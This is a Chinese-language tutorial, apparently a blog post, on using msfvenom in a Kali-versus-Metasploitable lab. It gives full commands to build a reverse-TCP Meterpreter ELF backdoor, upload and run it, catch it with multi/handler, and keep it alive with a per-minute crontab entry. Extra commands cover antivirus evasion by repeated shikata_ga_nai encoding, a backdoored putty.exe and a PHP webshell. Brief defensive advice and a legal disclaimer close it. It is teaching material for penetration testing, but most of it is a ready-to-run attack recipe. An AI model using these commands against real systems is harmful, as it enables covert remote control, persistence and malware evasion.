Msfvenom深度解析:从MSF分离出的后门生成器,Linux计划任务持久化实战
摘要:Msfvenom是Metasploit框架中独立的载荷生成工具,可创建木马后门。本文将详细讲解Msfvenom的前世今生(从MSF中的msfpayload+msfencode合并而来)、核心特点(支持多平台、多格式、编码免杀等),并实战演示生成Linux反向Shell后门,上传至靶机执行,利用multi/handler建立Meterpreter会话。更进一步,使用crontab计划任务实现后门自动重启(持久化)。内容涵盖后门生成、文件传输、权限设置、监听连接、计划任务配置以及多会话管理。
一、实验环境
| 设备 | 操作系统 | IP地址 |
|---|---|---|
| 攻击机 | Kali Linux 2026.1 | 10.0.0.129 |
| 靶机 | Metasploitable 2 (Linux) | 10.0.0.243 |
二、Msfvenom工具详解
2.1 前世今生
Msfvenom的前身是Metasploit框架中的两个独立工具:
msfpayload:用于生成payload(漏洞载荷)的原始二进制文件或代码。
msfencode:用于对payload进行编码,以绕过杀软检测。
在Metasploit 4.0版本之后,开发团队将两者合并为msfvenom,统一了命令行接口,简化了操作。现在msfvenom是Kali Linux内置的核心工具之一,与msfconsole配合使用。
2.2 核心特点
| 特性 | 说明 |
|---|---|
| 多平台支持 | 可生成Windows、Linux、macOS、Android、iOS等平台的payload |
| 多格式输出 | elf,exe,python,c,raw,ps1,vba等数十种格式 |
| 载荷丰富 | 支持meterpreter,shell,bind,reverse_tcp,reverse_https,web_delivery等 |
| 编码免杀 | 内置shikata_ga_nai等多态编码器,可多次编码绕过AV |
| 嵌入模板 | 可注入到合法可执行文件(如putty.exe)中 |
| 与MSF无缝集成 | 生成的payload可直接被multi/handler监听 |
2.3 常用参数
msfvenom -l payloads # 列出所有可用载荷 msfvenom -l encoders # 列出所有编码器 msfvenom -l formats # 列出所有输出格式常用参数:
-p:指定payload(如linux/x86/meterpreter/reverse_tcp)-f:输出格式(elf,exe,python等)LHOST:攻击机监听IP(反向连接目标地址)LPORT:攻击机监听端口-e:指定编码器(如x86/shikata_ga_nai)-i:编码次数(如-i 5)-o:输出文件名-a:指定架构(x86,x64)-platform:指定平台(windows,linux)
三、实战:生成并部署Linux后门
步骤1:在Kali中生成后门文件
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.129 LPORT=4444 -f elf -o shell生成的文件名为shell,类型为ELF可执行文件。
步骤2:将后门上传至靶机
先通过破解的靶机用户和密码登录靶机,设置root密码
然后使用SCP上传:
scp -o HostKeyAlgorithms=+ssh-rsa shell root@10.0.0.243:/mnt/ #添加-o HostKeyAlgorithms=+ssh-rsa这个是因为靶机密钥算法太旧,所以kali默认禁用了,临时使用添加这个即可输入靶机root密码。
步骤3:在靶机中赋予执行权限并后台运行
通过SSH登录靶机(例如使用msfadmin账户):
ssh msfadmin@10.0.0.243 sudo -i # 切换root,密码刚设置的 chmod +x /mnt/shell /mnt/shell & # 后台运行步骤4:在Kali中启动MSF监听
msfconsole -q msf > use exploit/multi/handler # 使用通用监听模块,等待目标反向连接 msf > set payload linux/x86/meterpreter/reverse_tcp # 设置反向TCP的Meterpreter载荷(针对32位Linux) msf > set LHOST 10.0.0.129 # 设置攻击机本地IP地址,用于接收连接 msf > set LPORT 4444 # 设置攻击机本地监听端口 msf > run # 启动监听器,等待目标执行载荷后建立会话稍等片刻,会话建立:
步骤5:验证后门功能
meterpreter > getuid meterpreter > sysinfo四、持久化:创建计划任务自动重启后门
如果靶机重启,后门进程会消失。利用Linuxcrontab每分钟检查并运行后门。
步骤1:编辑计划任务
在靶机(root)中执行:
EDITOR=vim crontab -e添加以下行:
* * * * * /mnt/shell保存退出。
步骤2:验证计划任务
查看当前任务:
crontab -l测试是否每分钟执行:可添加一个额外任务测试时间戳:
* * * * * /bin/date >> /mnt/time.txt然后等待1分钟,检查/mnt/time.txt是否有时间更新。
步骤3:重启靶机,验证自动重连
重启靶机:
reboot在Kali中再次运行multi/handler监听,等待约1-2分钟后,应再次收到Meterpreter会话(因为cron每分钟执行一次后门)。
步骤4:多会话管理
当有多个会话时,可以查看所有会话:
meterpreter > background msf > sessions切换会话:
msf > sessions -i <ID>五、Msfvenom高级技巧(选读)
编码免杀:
# 生成一个 Windows 平台的 Meterpreter 反向 TCP 后门,并使用编码器尝试绕过杀毒软件 msfvenom -p windows/meterpreter/reverse_tcp \ # -p: 指定使用的 payload(攻击载荷) LHOST=x.x.x.x \ # 设置攻击机的 IP 地址(反向连接的目标) LPORT=4444 \ # 设置攻击机的监听端口 -e x86/shikata_ga_nai \ # -e: 使用编码器(shikata_ga_nai 是多态编码器) -i 5 \ # -i: 编码次数(这里重复编码 5 次,增加免杀效果) -f exe \ # -f: 指定输出文件格式(Windows 可执行文件) -o payload.exe # -o: 输出文件名嵌入模板:
# 将后门程序绑定到一个正常的 putty.exe 程序上,运行 putty 时会同时执行后门 msfvenom -p windows/meterpreter/reverse_tcp \ # 同样使用反向 Meterpreter 载荷 LHOST=x.x.x.x \ # 攻击机 IP LPORT=4444 \ # 攻击机端口 -x /path/to/putty.exe \ # -x: 指定模板文件(将后门注入该文件) -f exe \ # 输出 exe 格式 -o putty_backdoor.exe # 生成的木马文件名生成Web Shell:
# 生成一个 PHP 格式的 Webshell,用于上传到 Web 服务器,通过浏览器访问触发反向连接 msfvenom -p php/meterpreter/reverse_tcp \ # PHP 平台的反向 Meterpreter 载荷 LHOST=x.x.x.x \ # 攻击机 IP LPORT=4444 \ # 攻击机端口 -f raw \ # -f raw: 输出原始代码(不添加额外包装) -o shell.php # 保存为 .php 文件,可直接部署在 Web 目录六、总结
本文首先系统介绍了Msfvenom工具的历史演变(由msfpayload与msfencode合并而来)、核心特点(跨平台、多格式、编码免杀、无缝集成MSF)及常用参数。随后,在Kali Linux攻击机与Metasploitable 2靶机环境中,实战演示了使用Msfvenom生成Linux反向TCP Meterpreter后门,通过SCP上传并执行,配合Metasploit的multi/handler模块成功建立控制会话。为实现持久化,利用Linux crontab机制将后门设置为每分钟自动运行,验证了即使靶机重启后门仍能重新上线。实验展示了红队常用的持久化技术。防御此类攻击的措施包括:定期审计计划任务(crontab -l)、监控异常进程、限制/tmp、/mnt等目录的可执行权限、使用完整性监控工具(如AIDE)、以及限制非必要的文件上传功能。Msfvenom作为渗透测试的核心工具,其灵活性和强大功能值得安全从业者深入掌握。
重要声明:本教程及文中所有操作仅限于合法授权的安全学习与研究。作者及发布平台不承担因不当使用本教程所引发的任何直接或间接法律责任。请务必遵守中华人民共和国网络安全相关法律法规。
如果这篇文章帮你解决了实操上的困惑,别忘记点击点赞、分享,也可以留言告诉我你遇到的其它问题,我会尽快回复。你的关注是我坚持原创和细节共享的力量来源,谢谢大家。